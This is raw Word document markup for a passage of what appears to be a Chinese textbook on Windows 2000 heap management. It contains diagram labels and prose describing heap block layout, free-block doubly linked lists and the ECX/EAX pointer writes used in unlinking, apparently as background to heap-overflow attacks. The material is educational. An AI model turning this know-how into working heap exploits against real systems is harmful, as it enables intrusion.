                <v:shape id="文本框 96" o:spid="_x0000_s1088" type="#_x0000_t202" style="position:absolute;left:47818;top:362;width:5563;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BPwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P/B/CE7zNVAWJnVGGIPSgh3WK10fz1pY1LzWJWv/75SDs+PH9Xm8H24k7+dA61jCbZiCIK2da&#10;rjWcvvfvCkSIyAY7x6ThSQG2m9HbGnPjHvxF9zLWIoVwyFFDE2OfSxmqhiyGqeuJE/fjvMWYoK+l&#10;8fhI4baT8yxbSostp4YGe9o1VP2WN6vhuFuVqpg//WW1KPalus7cQZ21noyHzw8QkYb4L365C6NB&#10;pbHpS/oBcvMHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAxGYQT8AAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="16C4A5EC"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v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1089" type="#_x0000_t202" style="position:absolute;left:33897;top:621;width:556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XUxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6qxstlE3qKkUQcqiHRqXXR/aZBLNv092txn/vCoLHYWa+YebL0fbiRD50jjVMJxkI&#10;4tqZjhsNu+36TYEIEdlg75g0XCjAcvH8NMfCuDP/0KmKjUgQDgVqaGMcCilD3ZLFMHEDcfIOzluM&#10;SfpGGo/nBLe9nGXZh7TYcVpocaBVS/Wx+rcaNqu8UuXs4n/z93Jdqb+p+1Z7rV9fxq9PEJHG+Ajf&#10;26XRoHK4fUk/QC6uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKsqtdTEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="4BAB90B9"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v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1090" type="#_x0000_t202" style="position:absolute;left:11653;top:621;width:556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UwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WVIWlrUYRQehBD9tVvA7N2BabSU2i1n+/OSzs8fG+V5vBdOJJzreWFcymCQjiyuqW&#10;awWnn/1nCsIHZI2dZVLwJg+b9ehjhbm2L/6mZxlqEUPY56igCaHPpfRVQwb91PbEkbtaZzBE6Gqp&#10;Hb5iuOnkPEm+pMGWY0ODPe0aqm7lwyg47rIyLeZvd8kWxb5M7zN7SM9KTcbDdgki0BD+xX/uQivI&#10;4vr4Jf4Auf4FAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAv8mKlMAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="018DF5F1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>8</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>字节</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="矩形 91" o:spid="_x0000_s1091" style="position:absolute;top:3177;width:110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14:paraId="0AA7D96B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00747D3A" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r w:rsidRPr="00747D3A">
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>Buf1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>用户内存</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 92" o:spid="_x0000_s1092" style="position:absolute;left:9402;top:3177;width:156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6BBDEEFB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00734F55" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r w:rsidRPr="00734F55">
                          <w:t>Buf2</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00734F55">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>的管理结构</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 93" o:spid="_x0000_s1093" style="position:absolute;left:20521;top:3184;width:1019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5F38B606" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="004C22B0" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r w:rsidRPr="004C22B0">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>Buf</w:t>
                        </w:r>
                        <w:r w:rsidRPr="004C22B0">
                          <w:t>2</w:t>
                        </w:r>
                        <w:r w:rsidRPr="004C22B0">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>用户内存</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="文本框 94" o:spid="_x0000_s1094" type="#_x0000_t202" style="position:absolute;left:12830;top:8817;width:17139;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yXxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdaOWkqSuIoKQgx4alV4f2dckNPs27q4a/71bKPQ4zMw3zHI9mE7cyPnWsoLZNAFB&#10;XFndcq3gdNy9piB8QNbYWSYFD/KwXo1elphre+dPupWhFhHCPkcFTQh9LqWvGjLop7Ynjt63dQZD&#10;lK6W2uE9wk0n50nyLg22HBca7GnbUPVTXo2CwzYr02L+cF/ZotiV6WVm9+lZqcl42HyACDSE//Bf&#10;u9AKsjf4/RJ/gFw9AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMDyjJfEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="6A3400A7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>系统返回的Buf</w:t>
                        </w:r>
                        <w:r>
                          <w:t>2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>可用空间</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="连接符: 肘形 96" o:spid="_x0000_s1095" type="#_x0000_t33" style="position:absolute;left:9402;top:6606;width:3428;height:41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GgexAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;EIXvQv9DmII3zbagtKtRRNpST+q2iMchGTeLm8l2k67rvzdCocfHm/e9efNl72rRURsqzwqexhkI&#10;Yu1NxaWC76/30QuIEJEN1p5JwZUCLBcPgznmxl94T10RS5EgHHJUYGNscimDtuQwjH1DnLyTbx3G&#10;JNtSmhYvCe5q+ZxlU+mw4tRgsaG1JX0ufl16423v/Ed31D2uDz9bq3dusimVGj72qxmISH38P/5L&#10;fxoFr1O4b0kAkIsbAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACs0aB7EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:shape id="连接符: 肘形 97" o:spid="_x0000_s1096" type="#_x0000_t33" style="position:absolute;left:44635;top:6606;width:2028;height:585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2FxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;EMXvgt8hjNCbZhVa29UoIm1pT/5pEY9DMm4WN5PtJl23374RBI+PN+/35s2XnatES00oPSsYjzIQ&#10;xNqbkgsF319vw2cQISIbrDyTgj8KsFz0e3PMjb/wjtp9LESCcMhRgY2xzqUM2pLDMPI1cfJOvnEY&#10;k2wKaRq8JLir5CTLnqTDklODxZrWlvR5/+vSG68759/bo+5wffjZWL11j5+FUg+DbjUDEamL9+Nb&#10;+sMoeJnCdUsCgFz8AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAER4zYXEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1097" type="#_x0000_t202" style="position:absolute;left:46664;top:10338;width:4636;height:4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aSwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WVIWlrUYRQehBD9tVvA7N2BabSU2i1n+/OSzs8fG+V5vBdOJJzreWFcymCQjiyuqW&#10;awWnn/1nCsIHZI2dZVLwJg+b9ehjhbm2L/6mZxlqEUPY56igCaHPpfRVQwb91PbEkbtaZzBE6Gqp&#10;Hb5iuOnkPEm+pMGWY0ODPe0aqm7lwyg47rIyLeZvd8kWxb5M7zN7SM9KTcbDdgki0BD+xX/uQivI&#10;4tj4Jf4Auf4FAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAQb+GksAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="60804FAB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>EAX</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="连接符: 肘形 99" o:spid="_x0000_s1098" type="#_x0000_t33" style="position:absolute;left:49972;top:6605;width:3239;height:418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sxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;EIXvBf9DGKG3mlWo1K1RiqjUU+sq4nFIppulm8m6Sdftv28KgsfHm/e9efNl72rRURsqzwrGowwE&#10;sfam4lLB8bB5egERIrLB2jMp+KUAy8XgYY658VfeU1fEUiQIhxwV2BibXMqgLTkMI98QJ+/Ltw5j&#10;km0pTYvXBHe1nGTZVDqsODVYbGhlSX8XPy69sd47v+3OusfV6fJh9ad73pVKPQ77t1cQkfp4P76l&#10;342C2Qz+tyQAyMUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFqr/GzEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:rect id="矩形 100" o:spid="_x0000_s1099" style="position:absolute;left:29822;top:3183;width:15636;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11CxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8Mw&#10;DIXvg/0Ho8Fuq70eui6tW8roYLCxsraHHkWsJqGxHGwvSf/9dBj0JvGe3vu0XI++VT3F1AS28Dwx&#10;oIjL4BquLBwP709zUCkjO2wDk4UrJViv7u+WWLgw8A/1+1wpCeFUoIU6567QOpU1eUyT0BGLdg7R&#10;Y5Y1VtpFHCTct3pqzEx7bFgaauzorabysv/1FsKuubab+Prdf9HL6XOXzTDOttY+PoybBahMY76Z&#10;/68/nOAbwZdnZAK9+gMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCsx11CxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="2248FBF7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00A47BED" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>下一空闲堆的管理结构</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="文本框 96" o:spid="_x0000_s1100" type="#_x0000_t202" style="position:absolute;left:53212;top:8660;width:4565;height:4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1xwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WtApLrUYRQehh97B1F69DM7bFZlKTrNZ/vxEEb/N4n7PaDKYTV3K+tawgnSYgiCur&#10;W64V/Bz27xkIH5A1dpZJwZ08bNajtxXm2t74m65lqEUMYZ+jgiaEPpfSVw0Z9FPbE0fuZJ3BEKGr&#10;pXZ4i+Gmk7Mk+ZAGW44NDfa0a6g6l39GwdduUWbF7O6Oi3mxL7NLaj+zX6Um42G7BBFoCC/x013o&#10;OD9J4fFMvECu/wEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA+7o1xwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="74035635" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>ECX</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="矩形 102" o:spid="_x0000_s1101" style="position:absolute;left:44636;top:3190;width:13213;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45DE5EC4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:szCs w:val="21"/>
                          </w:rPr>
                          <w:t>两个双链表的指针</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="639D2903"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hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">.18 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>第二次申请堆的内存结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3B4616"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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>uf1后面是buf2管理结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>buf2后面是空闲堆管理结构，然后是链表指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFC8658"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在Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的堆管理中，ECX和EAX寄存器用作链表操作，主要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">mov [ecx],eax </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>mov [eax+4],ecx</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行链表管理，接下来进一步介绍堆块的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BABB54"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Windows中的空闲堆块以双向链表的形式保存，当程序申请堆内存，操作系统根据程序申请的大小从相应的双向链表中取下一个堆块分配给程序，申请内存之前的双向链表如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.19</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示，其中a、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>p1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>p2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>均为一个堆块的前后向指针。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B16BCA" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C812243" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="607" w:left="1275" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32A9DBA7" wp14:editId="395C671E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2977103</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>288925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="748030" cy="363855"/>
                <wp:effectExtent l="0" t="38100" r="52070" b="36195"/>
                <wp:wrapNone/>
                <wp:docPr id="103" name="直接箭头连接符 103"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="748030" cy="363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7E7855" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
